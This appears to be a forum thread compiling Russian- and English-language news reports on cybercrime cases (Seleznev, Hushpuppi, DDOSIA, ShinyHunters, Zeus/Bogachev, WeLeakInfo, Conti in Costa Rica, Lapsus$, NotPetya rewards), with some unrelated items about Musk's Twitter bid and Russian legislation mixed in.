Американский суд еще в марте 2011 года выдал ордер на арест на имя Романа Селезнева. По утверждению американских властей, в последующие три года его не удавалось задержать лишь потому, что он посещал страны, с которыми у США не подписано соглашение об экстрадиции. Власти Мальдив — страны, с которой у США также нет соглашения об экстрадиции, — согласились задержать Селезнева и передать его представителям органов правопорядка США на том основании, что имя россиянина числилось в базе Интерпола.
Молодой человек был задержан на Мальдивах в июле 2014 года. Позднее он был вывезен на частном самолете в Соединенные Штаты и заключен под стражу на острове Гуам в Тихом океане. Впоследствии он был перевезен в Сиэтл и помещен в спецблок тюрьмы.
Защита россиянина изначально заявляла о возможной ошибке - задержании не того человека, которого власти США подозревали в причастности к кибермошенничеству.
Дело Селезнева рассматривалось в Федеральном суде Западного округа Вашингтона, приговор был оглашен в апреле 2017 года.
Гражданин РФ Денис Сотников, обвиняемый властями Соединенных Штатов в отмывании денег, полученных в результате мошенничества как минимум на 30 миллионов долларов, решением федерального суда округа Нью-Джерси отправлен под стражу.
По данным американской прокуратуры, 36-летний россиянин являлся участником мошеннической схемы, реализация которой пришлась на период с апреля 2018 года по март 2020 года и которая принесла ее создателям миллионы долларов.
Суть обмана состояла в рекламировании и продаже различных несуществующих продуктов и услуг, связанных с инвестиционными возможностями, в первую очередь, фиктивными депозитными сертификатами. В большинстве случаев злоумышленники использовали клоны веб-сайтов, «которыми управляют существующие, хорошо известные и авторитетные финансовые учреждения».
Получив интересовавшую их информацию по указанному на таком сайте-клоне телефону или посредством электронной почты, пользователи переводили денежные средства по представленным банковским реквизитам, не получая при этом взамен оплаченную услугу или продукт.
Как отмечает Министерство юстиции США, Сотников начал участвовать в преступной схеме где-то в феврале 2019 года и успел получить от 18 жертв около 6 миллионов долларов, которые впоследствии были переведены на банковские счета, подконтрольные ему или его близким родственникам, в различных странах, включая Россию, Грузию, Турцию и специальный административный регион Гонконг.
По данным американских властей, из полученной суммы приблизительно 3,7 миллиона долларов были либо заморожены банками, либо возвращены пострадавшим в результате мошенничества лицам, еще около 700 тысяч долларов были переведены на банковские счета в Гонконге и Турции. Оставшиеся денежные средства якобы были потрачены россиянином на личные нужды, в числе которых приобретение нескольких роскошных автомобилей, покупки в дорогих розничных магазинах – таких, как Louis Vuitton, Tiffany & Co. и Cartier.
В американском Минюсте отмечают, что Сотников, получая уведомления от представителей банков о блокировании его счетов по признакам мошенничества, продолжал открывать новые счета в других банках и использовал их для незаконной деятельности.
Максимальное наказание, которое грозит россиянину, — до 20 лет лишения свободы и штраф в размере до полумиллиона долларов. Наряду с этим Комиссия по ценным бумагам и биржам США подала к россиянину и аффилированным с ним компаниям иск о возмещении ущерба.
• Source: justice[.]gov/usao-nj/pr/florida-man-charged-money- laundering-30-million-wire-fraud-scheme
• Source: justice[.]gov/usao-nj/press-release/file/1258036/download
Илон Маск ведет переговоры с акционерами Twitter о продаже акций компании. Об этом написал целый ряд деловых изданий в США.
Пресса пишет, что еще недавно высказывания Маска о желании купить 100% соцсети не принимались всерьез. Но на прошлой неделе Маск провел встречи с акционерами компании, которых он убеждал в серьезности своего предложения. А 24 апреля встретился с советом директоров. Сообщается, что сделка может быть заключена уже до конца апреля — но может быть и не заключена совсем.
14 апреля Маск сообщил, что готов выкупить акции Twitter по $54,2 за штуку, чтобы компания стала частной. На эту сделку ему потребуется $43 млрд. Ранее стало известно, что Маск уже купил 9.1% акций Твиттера.
"Я инвестировал в Twitter, потому что верю в его потенциал как всемирной платформы, где обеспечена свобода высказываний. И я считаю, что свобода слова — это социальный императив для функционирования демократии", — написал Маск. На его взгляд, это можно обеспечить, только если Twitter станет частной компанией.
Он предлагает выкупить акции почти на 20% дороже их стоимости на бирже. По его словам, это его лучшее и последнее предложение — если оно не устроит акционеров, то он тоже потеряет интерес к соцсети и продаст свой пакет акций.
Ранее Маск критиковал Twitter, который, на его взгляд, не всегда придерживается принципов свободы высказываний и заявлял о намерении создать свою соцсеть.
source: wsj.com/articles/twitter-re-examines-elon-musks-bid-may-be-more- receptive-to-a-deal-11650822932
Дубай, ОАЭ. Банда из 12 человек, обвиняемых в отмывании денег и кибермошенничестве, была арестована в Дубае.
Среди задержанных – звезда социальной сети Instagram Раймонд Аббас, больше известный как Hushpuppi, и Олалекан Якоб Понле по прозвищу Woodbery.
Сообщается, что при задержании были изъяты 13 роскошных автомобилей и 150 млн дирхамов наличными (US$ 41 млн).
Полицейская спецоперация под названием «Охота на лис 2» разоблачила преступную сеть, которая совершала преступления за пределами Объединенных Арабских Эмиратов, включая такие, как отмывание денег, онлайн-мошенничество и онлайн- взломы, подлог и кража личных данных, банковское мошенничество и др.
В результате рейда в распоряжение полиции попали документы о разработке международной мошеннической схемы на сумму 1,6 млрд дирхамов. Дубайская полиция использовала новейшие технологии и квалифицированную команду полицейских для проведения спецоперации.
“В состав банды входил Hushpuppi, который выставлял напоказ в социальных сетях свою роскошную жизнь. Он представлялся бизнесменом, чтобы заманивать своих жертв. Полиция следила за деятельностью банды, которая создавала фальшивые аккаунты в социальных сетях”, - сказал бригадир Джамаль Салем Аль Джаллаф, директор Департамента криминальных расследований Дубайской полиции.
Hushpuppi выкладывал фотографии с автомобилями Ferrari и Rolls Royce, а также на фоне частного самолета. Банда взламывала корпоративные адреса электронной почты и отправляла фальшивые письма корпоративным клиентам, чтобы те поменяли банковские реквизиты для перевода денег.
Они также создавали в интернете фальшивые сайты, чтобы воровать данные кредитных карт и получать деньги жертв для их последующего отмывания, уточнили в полиции.
В ходе ареста у банды были изъяты большие объемы данных о частных лицах, компаниях, банковских счетах, кредитных картах, документы, подтверждающие отмывание денег, онлайн-мошенничество и взлом аккаунтов жертв за пределами ОАЭ.
Помимо роскошных автомобилей и наличных, полиция конфисковала 21 компьютер, 47 смартфонов, 15 карт памяти, пять жестких дисков, на которых хранились 120 тысяч файлов и адреса более двух миллионов жертв.
Стоит напомнить, что в феврале 2020 года Дубайская полиция проводила первую часть спецоперации “Охота на лис”. Тогда было арестовано 9 мошенников, которым принадлежала 81 фальшивая компания в 18 странах мира. Рейды такого типа, уточнили в полиции, направлены на поимку киберпреступников.
Проект запущен русскоязычной группировкой NoName057(16).
Исследователи из ИБ-компании Radware обнаружили краудсорсинговый проект под названием “DDOSIA”, который платит добровольцам за DDoS-атаки на западные организации. По мнению экспертов, плата за атаки – новая стратегия, которой группировка пользуется для того, чтобы привлечь к делу не только добровольцев, но и тех, кто изначально не был заинтересован в проведении DDoS-атак.
Согласно отчету Radware, проект был запущен в середине августа русскоязычной группировкой под названием "NoName057(16)", которая появилась в марте 2022 года. Впервые на радарах ИБ-специалистов хакеры появились после отчета компании Avast, выпущенного в начале сентября. В своем отчете Avast обратила внимание на наличие DDoS-модуля в арсенале группировки. Этот модуль загружался с помощью RAT Bobik, который распространялся инфостилером RedLine.
С июня по сентябрь Avast следила за деятельностью NoName057(16) и пришла к выводу, что группировка участвовала в DDoS-атаках на украинские организации, но лишь 40% из них были успешными.
В отчете Radware сказано, что проект DDOSIA был запущен в Telegram, где операторы разместили ссылку на GitHub с инструкциями для потенциальных добровольцев. На сегодняшний день Telegram-канал группировки насчитывает более 13 000 участников.
DDOSIA была запущена в Telegram, где операторы поделились ссылкой на страницу GitHub, содержащую инструкции для потенциальных добровольцев. Сегодня канал насчитывает более 13 000 участников.

Анонс проекта в Telegram.
Согласно заявлению самих хакеров, DDOSIA – самостоятельный проект, который сам выбирает цели атак. Например, совсем недавно они принимали участие в крупномасштабной DDoS-атаке на аэропорты США.

Чтобы начать работу в проекте, добровольцам необходимо зарегистрироваться через Telegram, чтобы получить ZIP-архив с вредоносным ПО (dosia.exe), которое содержит уникальный ID для каждого “волонтера”. Этот идентификатор можно привязать к криптокошельку и получать деньги за участие в DDoS-атаках, причем оплата пропорциональная мощностям, которые предоставляет конкретный участник.
Награды распределяются следующим образом:
Участник, занявший первое место в каждой волне атак, получает 80 000 рублей;
Занявший второе место – 50 000 рублей;
А занявший третье место – 20 000 рублей.
Во время атак на аэропорты США добровольцы могли заработать больше, так как организаторы DDOSIA объявили, что распределят награды среди десяти лучших участников.

Вознаграждение самых активных участников DDOS-атак.
По словам специалистов Radware, проект DDOSIA насчитывает около 400 участников и остается полузакрытой группировкой, принимающей новых участников только по приглашениям. В списке ее целей регулярно оказываются 60 военных и образовательных украинских организаций.
Эксперты считают, что финансовое вознаграждение за DDoS-атаки может стать трендом у других DDoS-группировок и поможет NoName057(16) привлечь массу добровольцев.
В Астрахани завершился суд над местным жителем, который создал вредоносную
компьютерную программу для будущей ее продажи за крупную сумму.
При помощи вируса, который устанавливался на устройство жертвы, хакер мог
завладеть любой информаций, имеющей на нем. Отмечается, что придумал
астраханец программу не позднее 17 августа прошлого года. Затем он продал ПО
за 22 тысячи рублей, а вместо обычного покупателя отправил программу прямо в
руки подставного лица.
В результате УФСБ смогло пресечь деятельность преступника, а суд, выслушав обе
стороны, отправил его на два года в колонию строгого режима, так обязав
выплатить государству штраф в сумме 100 тысяч рублей.
ShinyHunters, a trusted threat actor, is offering on a hacker forum the
databases stolen from eighteen companies, over 386 million user records
available online.
The known threat actor
[ShinyHunters](https://securityaffairs.co/wordpress/106364/data-breach/dave-
com-data-breach.html) has begun leaking for free the databases of multiple
companies on a hacker forum. A couple of days ago, the popular digital banking
app Dave.com disclosed a security breach after
[ShinyHunters](https://securityaffairs.co/wordpress/103003/cyber-crime/shiny-
hunters-dark-web.html) leaked 7,516,625 user records on a crime forum. In the
past months, ShinyHunters made the headlines for selling data of many other
organizations, below the complete list published by BleepingComputer:
Company| User Records| Price
---|---|---
[Tokopedia](https://securityaffairs.co/wordpress/102666/data-breach/tokopedia-
hacked.html)| 91 million| $5,000
[Homechef](https://securityaffairs.co/wordpress/105371/cyber-crime/databases-
stolen-14-companies.html)| 8 million| $2,500
Bhinneka| 1.2 million| $1,200
Minted| 5 million| $2,500
Styleshare| 6 million| $2,700
Ggumim| 2 million| $1,300
Mindful| 2 million| $1,300
StarTribune| 1 million| $1,100
ChatBooks| 15 million| $3,500
The Chronicle Of Higher Education| 3 million| $1,500
Zoosk| 30 million| $500
The group was also involved in the leak of the Promo.com data and the breach of Microsoft private GitHub repository. The threat actors released nine new databases belonging to several companies, including Havenly, Indaba Music, Ivoy, Proctoru, Rewards1, Scentbird, and Vakinha. The remaining nine databases were already released by ShinyHunters in the past. BleepingComputer verified the authenticity of some of the exposed data and published the full list of the 18 archives leaked by the threat actor:
Company| User Records| Reported Breach Date| Known?
---|---|---|---
Appen.com| 5.8 Million| N/A| No
Chatbooks.com| 15.8 Million| March 26th, 2020| Yes
Dave.com| 7 Million| July 2020 *| Yes
Drizly.com| 2.4 Million| July 2020 *| No
GGumim.co.kr| 2.3 Million| March 2020 *| Yes
Havenly.com | 1.3 Million| June 2020 *| No
Hurb.com| 20 Million| N/A|
Yes
Indabamusic.com| 475 Thousand| N/A| No
Ivoy.mx| 127 Thousand| N/A| No
Mathway.com| 25.8 Million| January 2020 *| Yes
Proctoru.com| 444 Thousand| N/A| No
Promo.com| 22 Million| July 2020| Yes
Rewards1.com| 3 Million| July 2020 *| No
Scentbird.com| 5.8 Million| N/A| No
[Swvl.com](https://portswigger.net/daily-swig/egyptian-bus-operator-swvl-hit-
by-data-breach)| 4 Million| N/A| [Yes](https://portswigger.net/daily-
swig/egyptian-bus-operator-swvl-hit-by-data-breach)
TrueFire.com| 602 Thousand| N/A| [Yes](https://media.dojmt.gov/wp-
content/uploads/Consumer-76.pdf)
Vakinha.com.br| 4.8 Million| N/A| No
Wattpad| 270 Million| June 2020 *| Yes
From the samples seen of these databases, BleepingComputer has confirmed that
the exposed email addresses correspond to accounts on the services.
The huge trove of data contains over 386 million user records, but only some
of them included the user’s password. Users of the above companies are
recommended to change their passwords as soon as possible, they have to change
the passwords where they used the same login credentials.
Source: <https://securityaffairs.co/wordpress/106504/data-breach/shinyhunters- data-leak.html>
В Томске неизвестные напали с пистолетом на местного жителя, похитив у него
биткоины, личные вещи и наличные. (20,10,2021)
Как уточняется, утром 24-летний Владислав вышел из своей квартиры, однако в
подъезде его ждал незнакомец в медицинской маске. Угрожая оружием, он заставил
потерпевшего вернуться домой. В этот момент к злоумышленнику присоединился его
подельник. "Цифровые" налётчики заковали парня в наручники, посадили за
компьютер, заставили зайти на сайт криптовалютной биржи и перевести средства
на их кошелёк. На счету у Владислава было 90 биткоинов. Преступники приказали
перевести 85 биткоинов (около 400 млн рублей).
После этого грабители уложили Владислава на кровать, связали ноги скотчем и
сказали, что после их ухода придёт ещё один сообщник. Спустя некоторое время в
квартире действительно появился третий злоумышленник в медицинской маске. Он
присматривал за парнем до вечера, потом "надзирателю" позвонили, и он ушёл.
Когда потерпевший сумел освободиться, то увидел, что кроме биткоинов у него
забрали ноутбук, смартфоны, российский и загранпаспорт, а также наличные (100
тысяч рублей и 1500 долларов) и жёсткий диск, стоимость которого превышает 400
тысяч рублей. Поздно ночью житель Томска обратился в полицию. Сейчас
правоохранители устанавливают личности преступников.
https://life.ru/p/1442543
Если Вы думаете, что самые опасные хакеры в мире родом из Америки, Англии или
Китая, то вы глубоко ошибаетесь. Министерство безопасности США заявляет, что
по количеству хакеров и их уровню подготовки – Россия ушла далеко вперед.
Сегодня мы расскажем вам о Евгении Богачеве — непойманном русском хакере, за
информацию о котором назначена награда в $3 миллиона (это самая большая сумма,
которая когда-либо назначалась за преступника). Не смотря на это Евгений
спокойно гуляет по Анапе и в ус себе не дует.
Стоит заметить, что в свое время за легендарного Кевина Митника давали лишь миллион.

ФБР дает 3 миллиона долларов за голову хакераКибервойна между США и Богачевым началась еще весной 2009 года. Тогда ФБР обратило внимание на то, что крупные пропажи денег с банковских счетов ряда компаний объединяет то, что все они были совершены с IP-адресов внутри самих компаний. Как оказалось, компьютеры были заражены вирусом-трояном Zeus («Зевс»). Человек, придумавший его, был известен только по псевдонимам в сети – Slavik, lucky12345 и еще нескольким.
Zeus проникал в компьютер стандартным способом – через фальшивый имейл от Налогового управления США или уведомления от курьерской компании UPS, которые заставляли пользователя перейти по ссылке. В зараженном компьютере хакеры могли делать все, что хотели – узнавать пароли, PIN, ответы на «секретные» вопросы и многое другое. Получая таким образом информацию, хакеры опустошали счета своих жертв. Кроме того, подцепившие вирус компьютеры можно было объединить в ботнет – сеть из тысяч машин, чьи ресурсы скрытно использовались. Постепенно Zeus стал любимым оружием киберпреступников. Богачев же вел себя в высшей степени профессионально – регулярно выпускал обновления для программы, устраивал бета-тестирование новых функций.
Вскоре он пошел дальше: начал собирать вокруг себя команду хакеров-
единомышленников. Ущерб от их работы оказался огромным – счет жертвам шел на
сотни. Чтобы обналичить украденное, ребята пользовались услугами «денежных
мулов» – людей, которые ходили по банкам в Нью-Йорке, открывая там счета и
снимая определенные суммы.
Впоследствии такие же схемы обнаружились в Румынии, Чехии, Великобритании, на
Украине и в России. ФБР удалось связать с группой Славика $70–80 млн,
присвоенных таким образом, но реальная сумма, по мнению следователей, гораздо
больше.
В 2010 году ФБР и Министерство юстиции США определили местонахождение нескольких лидеров группы – это оказался украинский Донецк. Операция по поимке троих мужчин в Донецке состоялась осенью того же года, а после этого было совершено еще 39 арестов по всему миру. Работа «Зевса» была нарушена, но ключевые игроки ускользнули, в том числе и герой нашей статьи.
Богачев так и остался в тени, отойдя от дел примерно на год, но уже осенью 2011 года специалисты по кибербезопасности начали замечать, что в сети появились новые варианты Zeus. За год отсутствия вирус стал еще мощнее и устойчивее. Хакеры стали атаковать иностранные банковские счета с огромными суммами денег. Команда похищала миллионы долларов в сутки, что не могло не раздражать ФБР. Остановить группировку Богачева пытались многие, но ни у кого не получалось, а убытки тем временем росли. За годы поисков у ФБР так и не появилось ни одного подозреваемого.
Интересный факт:
6 ноября 2012 года ребята украли $6,9 млн ОДНОЙ транзакцией.
Помимо банков, ребята и не брезговали любыми суммами, лежащими на счетах компаний и частных лиц. Именно группа Богачева ввела в практику кибершантаж, который процветает по сей день: хакеры заражают сторонние компьютеры программой, которая делает невозможным доступ к хранящимся на них файлам, и требуют с владельцев выкуп за снятие блокировки.
Поисками киберпреступников занялась международная группа расследователей,
состоявшая из 50 высококлассных профессионалов. Через несколько месяцев
эксперты напали на важный след: они смогли отследить на британском сервере
электронный адрес, который Богачем использовал для управления сайтами, а затем
сумели сопоставить адрес с аккаунтом в одной из российских соцсетей, который
наконец дал имя: Евгений Михайлович Богачев. Следователи не могли поверить
тому, что столь гениальный хакер допустил такую глупую ошибку. Эксперты
сошлись на том, что Богачев сделал это специально, чтобы заявить миру о себе.

Выяснилось, что главный враг спецслужб по всему миру – 30-летний мужчина из
Анапы, у которого есть жена, дочь и кот. Также было установлено, что «Зевс»
был не только вирусом для кражи паролей к банковским аккаунтам, но и
сложнейшим инструментом для сбора разведывательных данных. Доступ к этому
инструментарию, судя по всему, имел только Богачев. Команда специалистов не
смогла выявить прямой связи между хакером и российскими государственными
структурами, но предположила, что он работает на российскую разведку: сразу
после вторжения в Крым часть ботнета принялась искать засекреченные файлы
Украины.
30 мая 2014 года спецслужбы начали сильнейшую атаку на инфраструктуру Богачева, она длилась 60 часов и завершилась успешно. По итогу Евгений перестал пытаться реанимировать свою сеть. 2 июня ФБР и Министерство юстиции США предъявили Богачеву заочное обвинение по 14 пунктам, объявив награду в $3 миллиона за информацию о преступнике. Тем не менее, Евгений Михайлович Богачев по-прежнему на свободе.
На этой неделе совместная операция ФБР, а также правоохранителей из Северной Ирландии, Нидерландов, Германии и Великобритании привела к изъятию домена сайта WeLeakInfo.com. Более трех лет этот сервис продавал доступ к данным более чем 12,5 миллиардов учетных записей, собранных из 10 000 различных утечек. Фактически за плату сайт предоставлял доступ паролям людей открытым текстом. При этом сам доступ стоил всего 2 доллара в день.

На черном рынке сайт был известен и пользовался популярностью. Так, хакеры покупали доступ к WeLeakInfo, а затем искали в его недрах имя, email-адрес или имя пользователя, которого хотели взломать. В ответ на такие запросы сайт возвращал все связанные с этим пользователем данные, ранее утекшие из различных источников, включая пароли, если те были доступны. Злоумышленники использовали такие пароли, пытаясь авторизоваться с их помощью в различных профилях пользователя (надеясь, что жертва повторно использовала одинаковые пароли на разных сайтах).
В своем пресс-релизе Министерство юстиции США обратилось к общественности с просьбой помочь выявить владельцев сайта, а днем позже голландская полиция [арестовала](https://www.nu.nl/tech/6024433/arnhemmer-aangehouden-voor-rol- bij-zoekmachine-voor-gelekte-wachtwoorden.html) 22-летнего мужчину, который, похоже, являлся оператором WeLeakInfo.
Напомню, что это не первый закрытый ресурс такого рода. Ранее в 2017 году правоохранители так же ликвидировали другой «агрегатор утечек», торговавший чужими личными данными — LeakedSource. Его авторы, компания Defiant Tech Inc., собирали дампы различных утечек данных (как из открытого доступа, так и покупая их напрямую у хакеров), а затем продавали доступ к этой гигантской базе всем желающим. Среди доступных на сайте данных числись имена пользователей, ФИО, email-адреса, почтовые адреса, телефонные номера, а также пароли в открытом виде.
В настоящее время существует как минимум три других сайта, которые работают по той же схеме, что LeakedSource и WeLeakInfo: продают доступ к похищенным данным, включая пароли в открытом виде. Это Dehashed, Snusbase и Leak-Lookup.
Вымогатели повысили сумму требуемого у страны выкупа до $20 млн.
Кибервымогательская группировка Conti угрожает свергнуть новое правительство Коста-Рики и подняла сумму требуемого выкупа до $20 млн.
С апреля 2022 года Conti терроризирует Коста-Рику, осуществляя кибератаки на министерства , фонды, институты и электроэнергетические компании . Ситуация стала столь критической, что ранее в этом месяце правительство страны ввело чрезвычайное положение.
Изначально за ключ для восстановления зашифрованных файлов хакеры требовали $10 млн. Однако на прошлых выходных они опубликовали на своем сайте утечек два сообщения, увеличив сумму выкупа, которую должна заплатить Коста-Рика, до $20 млн и пригрозив свергнуть правительство нового президента Родриго Чавеса.
К настоящему времени из 670 ГБ похищенных у страны данных Conti уже опубликовала 97%, пишет издание The Record.
Коста-Рика получила помощь от США, Израиля и других стран. Американское правительство даже пообещало вознаграждение в размере $10 млн за информацию о Conti.
«Почему просто не купить ключ? Не знаю, бывали ли еще случаи введения чрезвычайного положения в стране из-за кибератаки? Через неделю мы удалим ключи шифрования для Коста-Рики. Я обращаюсь ко всем жителям Коста-Рики и к вашему правительству, организуйте митинги, чтобы они заплатили нам как можно скорее. Если ваше правительство не способно стабилизировать ситуацию? Может, тогда его следует сменить?», - говорится в первом сообщении на сайте утечек Conti.
Во втором сообщении вымогатели назвали президента США Джо Байдена «террористом» и заявили о повышении суммы выкупа.
«Просто заплатите, пока не поздно. Вашу страну разрушили два человека, мы намерены свергнуть правительство с помощью кибератак, мы уже продемонстрировали вам свою мощь и силу, вы даже ввели чрезвычайное положение», - заявили вымогатели.
С момента начала кибератак прошло уже более трех недель, но Коста-Рика все еще не может оправиться, в основном из-за ущерба, причиненного системам Министерства финансов. На прошлой неделе правительству даже пришлось уведомить своих граждан о необходимости подсчитывать налоги вручную и платить лично в местных банках, поскольку цифровая система вышла из строя.
Атака нанесла ущерб таможенной и налоговой службам, а также ряду других правительственных учреждений. С момента начала атак Министерство финансов страны не могло управлять ни одним из своих цифровых сервисов, что делает практически невозможным обработку требуемых законом документов, подписей и печатей.
Группа несет ответственность за сотни случаев вымогательства за последние два года.
Соединенные Штаты в пятницу предложили вознаграждение в размере до 15 миллионов долларов за информацию о российской группе вымогателей Conti, которую обвиняют в кибератаках с целью вымогательства по всему миру, заявил представитель Госдепартамента Нед Прайс.
По оценкам ФБР, более 1000 жертв группы Conti заплатили в общей сложности более 150 миллионов долларов выкупа, говорится в заявлении Прайса.
По его словам, американское внешнеполитическое ведомство "предлагает награду в размере до $10 млн за информацию, которая позволит установить личность или местонахождение кого-либо из лиц, являющихся руководителями" Conti. Госдепартамент также готов выплатить до $5 млн за сведения, которые позволят задержать "в любой стране" людей, связанных с указанной международной группировкой.
«Предлагая эту награду, Соединенные Штаты демонстрируют свою приверженность делу защиты потенциальных жертв программ-вымогателей по всему миру от эксплуатации киберпреступниками», — сказал он.
В прошлом году ФБР заявило, что Conti несет ответственность за нанесение
ударов по 16 медицинским сетям и сетям быстрого реагирования в Соединенных
Штатах. В прошлом месяце стало известно что Conti атаковали три немецкие
компании по возобновляемой энергетике подверглись взлому из-за отказа страны
от российской нефти.
По данным ФБР, в 2021 году кибервымогательские группировки взломали сети как
минимум 649 организаций критической инфраструктуры в США. Однако истинные
цифры могут быть выше, поскольку бюро стало вести учет заявлений об инцидентах
с использованием вымогательского ПО только в июне 2021 года. Кроме того, в
отчете ФБР не учитываются инциденты, о которых жертвы не сообщали.
source: state.gov/reward-offers-for-information-to-bring-conti-ransomware- variant-co-conspirators-to-justice
Группировка хакеров NB65 заявила о взломе российской компании QIWI, которая
предоставляет популярные платежные и финансовые сервисы в России и странах
СНГ.
Хакеры объявили о хищении данных о 12,5 миллионах кредиток и 30 миллионов
записей о платежах в системе. Согласно сообщению, злоумышленники выкрали около
10,5 терабайт информации.
Группировка пообещала ежедневно публиковать по миллиону строк из украденных
баз данных, если руководство QIWI не выйдет с хакерами на связь в течение трех
дней.
Накануне Qiwi опубликовала финансовые результаты за 2021 год: чистая прибыль
компании составила 17 536 миллионов рублей.
В самой компании возможный взлом не комментировали.
Госдепартамент США объявил награду в размере до $10 млн за информацию о шести предполагаемых сотрудниках российской разведки, которых американские власти обвиняют в причастности к кибератаке с применением вируса NotPetya в 2017 году.
"Вознаграждение в размере до $10 млн за информацию, которая позволила бы установить личность или определить местонахождение любого человека, который, действуя по поручению или под контролем иностранного правительства, участвовал в кибератаках против важных объектов инфраструктуры США", - говорится в распространенном заявлении госдепа.
В сообщении уточняется, что госдеп в данном случае просит информацию о шести россиянах из хакерской группировки, по утверждению США, известной как Sandworm Team, Telebots, Voodoo Bear и Iron Viking. Вашингтон считает, что разыскиваемые люди были причастны к заражению компьютеров в США и во всем мире вредоносной программой, известной как NotPetya, 27 июня 2017 года.
Ранее в ФБР отметили повышенный интерес хакеров к американским компаниям с момента начала спецоперации на Украине. По данным ведомства, хакеры, которые, вероятно, "связаны с российскими интернет-адресами", сканировали сети пяти энергетических американских компаний и, по меньшей мере, 18 американских компаний в таких секторах, как оборона и финансовые услуги.
Президент США Джо Байден также заявлял, что кибератаки являются одним из инструментов, которые "Россия, скорее всего, будет использовать". В свою очередь, заместитель помощника президента США по национальной безопасности Энн Нюбергер отмечала, что в настоящее время у Вашингтона нет доказательств какой- либо конкретной российской кибератаки.
Журналистам удалось пообщаться с матерью тинейджера у его дома в окрестностях Оксфорда.
За последние несколько недель хакерская группировка Lapsus$ взяла на себя ответственность за взломы ряда крупнейших технологических компаний, включая Nvidia , Samsung , Ubisoft , Okta и даже Microsoft . А руководителем операций, как сообщает Bloomberg, может быть английский подросток.
По данным издания, четверо исследователей провели расследование в отношении Lapsus$ от имени пострадавших компаний и пришли к выводу, что во главе группировки стоит тинейджер. Однако против него не было выдвинуто никаких официальных обвинений, и исследователям не удалось связать его с каждым взломом, которым хвасталась группировка.
Подросток, использующий псевдонимы White и breachbase, предположительно живет в окрестностях Оксфордского университета. По словам журналистов Bloomberg, им даже удалось пообщаться с его матерью через домофон.
Женщина заявила, что ничего не знает о том, в чем обвиняют ее сына, отказалась обсуждать его и не разрешила взять у него интервью.
Однако английский подросток – это еще не вся Lapsus$. Один предполагаемый участник группировки – подросток из Бразилии. Кроме того, исследователям удалось связать с ней семь уникальных учетных записей.
Как сообщает ИБ-эксперт и журналист Брайан Кребс, один из ключевых участников Lapsus$, использующий псевдонимы breachbase, Oklaqq и WhiteDoxbin, приобрел сайт Doxbin, где все желающие могут публиковать или находить персональную информацию с целью доксинга. Однако WhiteDoxbin оказался никудышним администратором и был вынужден продать сайт обратно его предыдущему владельцу. Перед этим он опубликовал все наборы данных Doxbin, из-за чего сам подвергся доксингу со стороны пользователей сайта. В частности, утекли его видео, предположительно снятые ночью возле его дома в Великобритании.
Похоже, что breachbase, White, Oklaqq и WhiteDoxbin, о которых сообщили Bloomberg и Кребс – одно и то же лицо.
Доксинг – поиск и публикация персональной или конфиденциальной информации о человеке без его согласия. Не всегда этот процесс включает в себя незаконные действия, но доксинг относится к нарушению сетевого этикета и часто запрещен внутренними правилами интернет-сообществ. Причиной доксинга может являться шантаж, месть или травля.
source: krebsonsecurity[.]com/2022/03/a-closer-look-at-the-lapsus-data- extortion-group
Мнение экспертов в студию. Неужели рансом перешёл на сторону аноглимусов ?
P.S. интересует техническое мнение образованных людей. А так же, тех экспертов, которые говорили "да они нихуя не могут, только ддосить"
Дехтярчук продавал доступ к учетным записям и информациям о кредитных картах пользователей
Во вторник в США гражданину России было предъявлено обвинение в том, что он якобы управлял онлайн-рынком, продающим доступ к кредитным картам, магазинам и платежным счетам в Интернете, принадлежащим десяткам тысяч жертв.
23-летний Игорь Дехтярчук, впервые появившийся на хакерских форумах под никнеймом floraby в 2013 году, фигурирующий в списке самых разыскиваемых ФБР киберпреступников, подозревается в том, что он является вдохновителем подпольного киберфорума и торговой площадки , получившего от Министерства юстиции США название Marketplace A. Сайт, запущенный в 2018 году, продавал украденные логины, персональную информацию о пользователях и инструменты аутентификации, в том числе дававшие доступ к данным кредитных карт.
Как уточняется в сообщении американской прокуратуры, площадка Marketplace A имела в среднем до 5000 ежедневных посетителей. Предполагается, что через нее были проданы до 48 тысяч скомпрометированных адресов электронной почты и до 39 тысяч взломанных онлайн-аккаунтов.
Дехтярчук был включен в список киберпреступников, в приоритетную очередь разыскиваемых Федеральным бюро расследований США. Обвинения Дехтярчуку были предъявлены заочно. В сообщении уточняется, что он проживает в России.
В случае признания виновным Дехтярчуку грозит до 20 лет федеральной тюрьмы, предупредило министерство юстиции.
source: fbi.gov/wanted/cyber/igor-dekhtyarchuk/@@download.pdf
Об этом сообщил зампред комитета по информационной политике, ) информационным технологиям и связи Олег Матвейчев.
По его словам —«ФСБ вместе с Дуровым пришли к компромиссу. Им удалось договориться, что жизни людей важны, ведь через Telegram переговариваются террористы.»
«Telegram
установил оборудование для отслеживания опасных субъектов, и отвечает на
запросы в рамках оперативных мероприятий.
Депутат Госдумы подчеркнул, что Telegram «просто площадка с различными блогерами». В нем нет цензуры и манипуляций информацией, как Facebook и Instagram. Разумеется, все изменится, ( если Telegram разрешит публиковать призывы к убийству россиян.
ИТ-специалисты могли бы развивать свои профессиональные компетенции и приносить пользу стране.
Заместитель главы Минпромторга Василий Шпак предложил создать в России кибервойска и сформировать гособоронзаказ в сфере кибербезопасности.
По словам Шпака, ИТ-специалисты, которые не смогли получить отсрочку от службы в армии, таким образом могли бы развивать свои профессиональные компетенции и приносить пользу стране.
"Было бы очень правильным, наверное - не имею права давать советы Минобороны, но как предложение - о создании кибервойск и о создании государственного заказа с точки зрения обороны и безопасности нашим разработчикам именно в этой сфере", - сказал Шпак на заседании комитета Госдумы по информационной политике во вторник.
«После этого, я надеюсь, они бы десять раз подумали перед тем, как покидать
пределы родины в погоне за длинным рублем в иностранных компаниях», – сказал
замминистра.
В августе прошлого года президент Украина Зеленский в рамках стратегии
кибербезопасности поручил создать на Украине кибервойска. В документе указано,
что Украина намерена сформировать систему действенной киберобороны "путём
образования в системе Министерства обороны Украины кибервойск".
Согласно оценкам экспертов компании Zecurion Analytics, Россия входит в пятерку стран с наиболее развитым уровнем кибервойск. Подобные войска используются для ведения военных действий в киберпространстве, однако ни одно государство мира на данный момент не признало своего участия в кибервойне.
В целом, как я понял и наличные, и машины можно будет легализовать.
Госдума приняла в первом и окончательном, третьем чтении закон о проведении в России с 14 марта 2022 года по 28 февраля 2023 года амнистии капиталов.
Click to expand...
Амнистия будет распространяться на деяния, совершенные до 1 января 2022 года.
Так, предприниматели смогут декларировать наличные денежные средства, а вместо ценных бумаг в законе появится определение «финансовые активы», что позволит легализовать не только акции или облигации, но и производные финансовые инструменты: фьючерсные контракты, опционы и другие, говорится в сообщении нижней палаты парламента.
